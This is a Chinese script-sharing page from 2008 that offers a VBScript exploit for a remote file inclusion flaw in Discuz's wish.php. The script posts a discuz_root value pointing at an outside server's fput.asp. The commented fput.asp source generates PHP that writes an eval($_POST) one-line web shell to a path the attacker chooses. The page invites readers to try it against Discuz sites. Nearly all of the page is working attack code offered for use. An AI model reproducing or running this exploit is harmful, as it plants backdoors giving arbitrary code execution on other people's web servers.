当前位置:DOS资源站资料中心VBS脚本 → php包含漏洞的通用上传vbs程序

php包含漏洞的通用上传vbs程序

减小字体 增大字体 作者:佚名  来源:本站整理  发布时间:2008-4-15 22:16:01

set http=createobject("Microsoft.XMLHTTP")
http.open "POST","
http://www.discuz.net:80/wish.php",false'漏洞的url地址
http.setrequestheader "Content-Type","application/x-www-form-urlencoded"
http.setRequestHeader "Cookie","123456xxxx" '自己抓取修改,如果没有验证就默认吧
name="
http://www.xxx.com/fput.asp?a=/可写物理目录/文件名.php?" '精华在这个fput.asp?a=可以自行修改生成的目录和文件名
http.send "discuz_root="&name'漏洞url的参数

'以下是fput.asp的源码
'<%
'Dim iPos, sStr
'sStr = Request.QueryString("a")
'iPos = InStr(sStr, "?")
'sStr = Left(sStr, iPos - 1)
'Response.Write "<?fputs(fopen('" & sStr & "','a+'),' <?eval($_POST[p])?>');?>"

'%>

大家可以用来试一下discuz许愿池wish.php漏洞